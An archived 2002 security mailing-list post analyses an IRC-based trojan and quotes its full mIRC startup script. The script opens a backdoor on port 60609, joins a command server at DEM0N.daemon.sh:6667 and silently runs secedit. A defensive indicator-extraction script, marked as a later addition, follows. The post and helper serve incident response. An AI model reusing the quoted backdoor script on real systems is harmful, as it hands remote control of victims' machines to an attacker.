Security Incidents mailing list archives

Re: Q328691 ?


From: Kyle Lai <aladin168 () hotmail com>
Date: 11 Sep 2002 08:48:02 -0000

In-Reply-To: <F1E50062AEB5D411971E002035710A7304C3F950@MSXDENUSR01>

One of the Microsoft PSS Security Specialists contacted me after reading my 
analysis.  I gave them a copy of the virus/trojan/malware I analyzed, and 
I also expressed my concern about their analysis.  I did not hear back 
from them yesterday, but maybe we should give them a couple of days.  However, 
I still want to make sure everyone that was infected runs Anti-Trojan 
software to remove any trojan and hacker tools.  It's detailed in my 
analysis.

http://groups.google.com/groups?dq=&start=25&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

I did point out that there was a file called "ncp.exe", which in fact was 
NetCat, one of hackers' favorite tools, which could possibly allow a hacker 
to remote control the victims' systems...  The other one is mt.exe, which could 
be a dDoS agent (not confirmed).  MS is aware of these situations.  Let's 
make sure all the victims out there are at least recovering their systems 
properly!

Also, secedit.bat did NOT change the security policies.  "DLL32NT.HLP" was 
the actual text (mirc script) file that caused the problems...

Here is the actual script that got run:
+++++++++++++
on *:start:{
  if ($exists(mdm.exe) == $false) { exit }
  //run mdm.exe /n /fh
  //set %server DEM0N.daemon.sh
  //set %timeout 10
  if ($portfree(60609) == $false) { exit }
  if ($portfree(60609) == $true) { /socklisten blah 60609 }
  //nick $read mdm.scr $+ $r(1,9)
  //timerc 1 4 //server %server $+ : $+ 6667
  //run mdm.exe /n /fh
  //remini NT32.ini ident userid
  //remini NT32.ini mirc user
  //remini NT32.ini mirc email
  //writeini NT32.ini ident userid $read mdm.scr
  //writeini NT32.ini mirc user $randomgen($r(0,9))
  //writeini NT32.ini mirc email $randomgen($r(0,9))
  //identd on $r(a,z) $+ $read mdm.scr $+ $r(a,z)
  //timercoolconnect -o 0 100 //server %server 6667
  //timer 1 1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet
  fos
}
+++++++++++++

As I looked in further, the "designer" of this trojan/malware used "UPX 
Executable Packer" from http://upx.sourceforge.net to compact the 
taskmngr.exe (really a mirc 5.70 client), so it reduced the filesize from 
1.3M to 442K.  It also compacted it so well that there are very few ASCII 
characters to read from a Hex Editor.  Once you use UPX to decompress it, 
you can read a lot more.  I am still trying to see if anything was 
modified.  Please let me know if anyone finds anything out there.  I am not 
sure if the mirc client has been modified...  

The above script also opened a backdoor on port 60609...

If you have more info, please pass along.

Regards,

Kyle Lai, CISSP, CISA
Kyle Lai Consulting
aladin168 () hotmail com
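A defender-side helper, added here as an example and not part of Kyle's post or any analysis tool mentioned in it: it parses the quoted mIRC startup script into its `|`-separated commands, resolves the `%server` variable, and pulls out the indicators an incident handler would want to triage a host or write a detection from (the listening port, the IRC C2 host and port, the binaries run, the INI and script files touched, and the identd spoofing). The script text below is a copy of the one quoted in the mail, joined back onto one line after the email line wrapping; the regexes and the indicator categories are this example's own assumptions about the script's syntax, not a general mIRC parser.

```python
"""Extract network and host indicators from the mIRC startup script quoted in the post."""
import re

# Copy of the script quoted in the mail, joined onto one line (the mail wrapped it).
SCRIPT = (
    "on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run mdm.exe /n /fh "
    "| //set %server DEM0N.daemon.sh | //set %timeout 10 "
    "| if ($portfree(60609) == $false) { exit } "
    "| if ($portfree(60609) == $true) { /socklisten blah 60609 } "
    "| //nick $read mdm.scr $+ $r(1,9) "
    "| //timerc 1 4 //server %server $+ : $+ 6667 | //run mdm.exe /n /fh "
    "| //remini NT32.ini ident userid | //remini NT32.ini mirc user "
    "| //remini NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr "
    "| //writeini NT32.ini mirc user $randomgen($r(0,9)) "
    "| //writeini NT32.ini mirc email $randomgen($r(0,9)) "
    "| //identd on $r(a,z) $+ $read mdm.scr $+ $r(a,z) "
    "| //timercoolconnect -o 0 100 //server %server 6667 "
    "| //timer 1 1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet "
    "| fos }"
)


def split_commands(script: str) -> list[str]:
    """Strip the 'on *:start:{ ... }' wrapper and split the body on the '|' separators."""
    body = re.sub(r"^on \*:start:\{", "", script.strip()).rstrip()
    if body.endswith("}"):
        body = body[:-1]
    return [part.strip() for part in body.split("|") if part.strip()]


def extract_indicators(script: str) -> dict:
    """Walk the commands in order (so //set assignments are seen before use) and collect IoCs."""
    variables: dict[str, str] = {}
    ind = {
        "listen_ports": set(),   # ports the script binds with /socklisten (the backdoor)
        "c2": set(),             # (host, port) pairs passed to //server, %vars resolved
        "executed": set(),       # programs started with //run
        "ini_files": set(),      # INI files rewritten with //writeini or //remini
        "files_read": set(),     # files consulted via $read or $exists
        "identd_spoofed": False, # //identd on with a randomised user id
    }
    for cmd in split_commands(script):
        m = re.search(r"//set %(\w+) (\S+)", cmd)
        if m:
            variables[m.group(1)] = m.group(2)
        m = re.search(r"/socklisten \S+ (\d+)", cmd)
        if m:
            ind["listen_ports"].add(int(m.group(1)))
        # Two spellings occur: "//server %server $+ : $+ 6667" and "//server %server 6667".
        m = re.search(r"//server (\S+)(?: \$\+ : \$\+)? (\d+)", cmd)
        if m:
            host = m.group(1)
            if host.startswith("%"):
                host = variables.get(host[1:], host)
            ind["c2"].add((host, int(m.group(2))))
        m = re.search(r"//run (?:-n )?(\S+)", cmd)
        if m:
            ind["executed"].add(m.group(1))
        for m in re.finditer(r"//(?:writeini|remini) (\S+)", cmd):
            ind["ini_files"].add(m.group(1))
        for m in re.finditer(r"\$read (\S+)|\$exists\(([^)]+)\)", cmd):
            ind["files_read"].add(m.group(1) or m.group(2))
        if "//identd on" in cmd:
            ind["identd_spoofed"] = True
    ind["variables"] = variables
    return ind


if __name__ == "__main__":
    for key, value in extract_indicators(SCRIPT).items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the indicator sets; the useful output for a responder is the listening port (60609), the C2 destination (DEM0N.daemon.sh:6667), and the file names to search for on suspected hosts, which can be fed straight into a port scan or a file-system sweep.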

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
